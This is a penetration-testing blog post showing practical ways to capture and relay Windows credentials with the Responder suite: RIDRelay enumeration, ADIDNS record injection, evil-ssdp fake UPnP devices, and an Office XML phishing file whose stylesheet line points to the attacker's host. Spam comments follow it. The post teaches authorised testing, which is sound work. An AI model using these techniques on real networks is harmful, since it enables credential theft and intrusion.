A blog about generally interesting infosec stuff by employees of SecQuest Information Security https://www.secquest.co.uk

Thursday, 27 September 2018

From Advanced Responder to Practical Usage - Practical Applications

In the previous two articles in this series we covered various ideas and theories on how to expand and utilise the entire Responder suite. This article is going to focus on expanding the suite further with a focus on practical usages for your penetration tests. If you have not already read the previous two articles in the series, you can find them on this website. I strongly advise that you read these two articles before this one, as this article assumes the knowledge contained within them.

Practical Applications – Identifying Targets

The primary difficulty with using MultiRelay is the identification and capturing of admin users and their hashes. Whilst you can specify an "ALL" parameter within MultiRelay if you are using the following techniques effectively this will likely create a lot of failed login attempt noise on the network. The tool RIDRelay, created by skorov allows us to enumerate all users on a domain with RID cycling using the hash passing. This tool can help us find admin users and other targets, privileges are not required.

To execute this attack successfully you merely need to start the tool using ridrelay.py –t <target> where the target parameter is a host on the domain. You can also use the –o parameter to output enumerated usernames to a file.

Example command: python ridrelay.py –t –o output.txt
The final step in the process is to get a user on the domain to connect to the SMB server within RIDRelay. To do this you can use any of the methods mentioned in the previous articles or one of the methods introduced below. Make sure that you turn off the SMB server in Responder temporarily if you started Responder before RIDRelay, or it will fail to bind to the necessary ports.
The download for this tool can be found on its GitHub page here: https://github.com/skorov/ridrelay

Practical Applications – ADIDNS

Since this method's history and technical background is so beautifully explained in this article: https://blog.netspi.com/exploiting-adidns/, we will only cover the basic practical usage of the tool. If you want to learn how this tool works and its history, please go and read the aforementioned article.
By manipulating dynamic DNS updates we are able to insert DNS records into ADIDNS if the default secure dynamic updates setting is enabled. Using the tool linked to below you can insert various records using the following commands:

Run this first:
Import-Module $PWD\Invoke-DNSUpdate.ps1
Import-Module $PWD\Powermad.ps1
Invoke-DNSUpdate –DNSType <type> -DNSName <subdomain/FQDN> -DNSData <destination>
Example: Invoke-DNSUpdate –DNSType A -DNSName smb.domain.local -DNSData

By inserting a new A record into ADIDNS we could re-route traffic from a major SMB server on the network to our own Responder server. It is also possible to add a wildcard record which will resolve as a fall back option for all DNS queries that do not exist within the DNS zone. This acts much like LLMNR/NBNS spoofing but may be available when they are not. You can also exploit WPAD through Responder even when LLMNR or wildcard additions are not available by adding a wpad record to the DNS zone.
New-ADIDNSNode –Node *
There are some limitations to what records you can and cannot add discussed in the article above, in essence; you will be unable to edit existing DNS records but are able to add new ones. 
The download for this tool can be found on its GitHub page here: https://github.com/Kevin-Robertson/Powermad

Practical Applications – SSDP

Another excellent tool which can help you exploit a Windows network is evil-ssdp. This tool creates a fake UPnP device using SSDP spoofing which will appear in users' Windows Explorer windows. When a user clicks on one of these fake UPnP devices, they can be redirected to malicious web pages which will allow you to grab their NetNTLM hash. As an interesting secondary capability, the tool is also capable of identifying XML related vulnerabilities in various applications.
Evil-ssdp can be executed by running the following:
essdp.py <interface> -t <template file>
Example: essdp.py eth0 –t Microsoft-azure
After running this command Windows devices on your local network will begin to detect your fake UPnP device and will display it to users. If the users click on this device, evil-ssdp will attempt to make an SMB connection back to your attacking machine. To intercept this and grab hashes or execute a hash passing attack make sure you are running Responder as discussed in previous articles. This will only work on old browsers that still support the file:// tag. The phishing functionality, which is shown below, works in all browsers. 

If you wish to maximise the effectiveness of this tool, I highly recommend creating your own template file to mimic the environment a user would normally see when visiting an internal website. A section on creating your own templates can be found towards the bottom of the Gitlab page, which can be found here: https://gitlab.com/initstring/evil-ssdp

Practical Applications – XML Office Files

This attack method can be used very effectively in an email phishing campaign against a domain, especially when targeted at admin users identified by RIDRelay. To create an XML file which will send the reader's hash to your Responder instance create the following XML file in a text editor:

<?xml version="1.0" encoding="utf-8" ?>
<?mso-application prodgid="Word.Document"?>
<?xml-stylesheet type="text/xsl" href=\\<Your Responder IP\directory\file.xsl?>

If you wish to add content to the Word document to make it look legitimate, you can first generate the document in Word and save it as an XML file via the Save As menu. After doing this, you can insert the third line of code in the XML code above into the top of your XML file. This method can be executed with multiple types of Office document including Excel spread sheets. When your victim opens this file they will be prompted to select an Office application to open it with if they have not opened an Office XML file before. If the target domain/host has a text editor assigned to read XML files by default, this attack is unlikely to work.
For further information on this attack, I highly recommend reading the article linked above.


Thank you for reading my practical guide to Responder, which builds upon my previous two guides for Intermediate and Advanced usage of the tool. If I find more ways to utilise the Responder suite in the future, I will issue another article discussing them. Responder is an extremely flexible tool, not just a niche attack for LLMNR/NBNS spoofing, as such; I highly recommend you seek out your own methods to expand your suite as well.


  1. I will read your two previous articles so that I can focus more on what you had to explain to us. It is just that I have to keep myself busy with the best MBA assignment writing service that I am availing myself of right now. Once I am done with it, I will join your discussion regarding all of this. I am sorry that I could not be part of it right now because of my academics but I will get back to you soon.

  2. This Blog is very informative for us. Thanks for writing about it. In this article, some examples help me in applying in daily life. amazing You have explained each and everything very well in detail. I hope you will write more pieces which help us in our daily routines. Vlone Hoodie

  3. I have to buy a light for my aquarium though before that I have to pay for my online cheap assignment help that I took from a top-notch brand. This has made me spent half of my monthly’s savings and I don’t know when will I buy the light for my fish. It’s been almost a month that my aquarium light has been fused and now I want to replace it. I will consider Supra Quad if it is worth investing in.


  4. I will always let you and your words become part of my day because you never know how much you make my day happier and more complete. There are even times when I feel so down but I will feel better right after checking UblUldU your blogs. You have made me feel so good about myself all the time and please know that I do appreciate everything that you have.UblUldU

  5. Hello, I am Anthony Anson from the London, United Kingdom. I am a blogger, academic writer at nursing writing service company and a digital marketer. I did bachelors in Advertising and Public Relations from the University of London. I have been working in this field for more than 5 years. My skills include all types of academic paper writing and buying, scheduling and advertising in various media format.

    best assignment help online

  6. Hello, I am Anthony Anson from the London, United Kingdom. I am a blogger, academic writer at nursing writing service company and a digital marketer. I did bachelors in Advertising and Public Relations from the University of London. I have been working in this field for more than 5 years. My skills include all types of academic paper writing and buying, scheduling and advertising in various media format.
    best assignment help experts
    management assignment help - assignmentsky

  7. If you're hosting a party or just want to treat your friends, how much fruit salad ca you make,you'll want to make sure everyone gets into the punch.
    how much fruit salad per person

    Now a days online business are very trending and tremendous all over the due to corovirus. This is very esay way to earn money online but i found in google i saw one article how to write and get paid marketing.
    Write and Get Paid

  8. I made my assignment by myself easily but I remember when I took admission to the university initially faced very difficulties with my academic work then I found a method to make my assignments through the help of Reflective essay writing service Uk UK [url=""]google uk[/url] service they are the best in the academic field.

  9. We Introduce Bomber Jackets In United State With Primium Quality Leather Used In Making Leather Jackets
    100 Mission A-2 Pilot’s Brown Leather Jacket

  10. We Provide You Best Paint rollers sets in the world.
    Paint Roller Sets

  11. Raulde Painting Kit allows you to paint anywhere in your house without any hassle.
    Visit for Paint Rollers

  12. Such an informative post. The article is really helpful. Thanks for sharing the knowledge and experience.
    Site : Southside Serpents Black Leather Jacket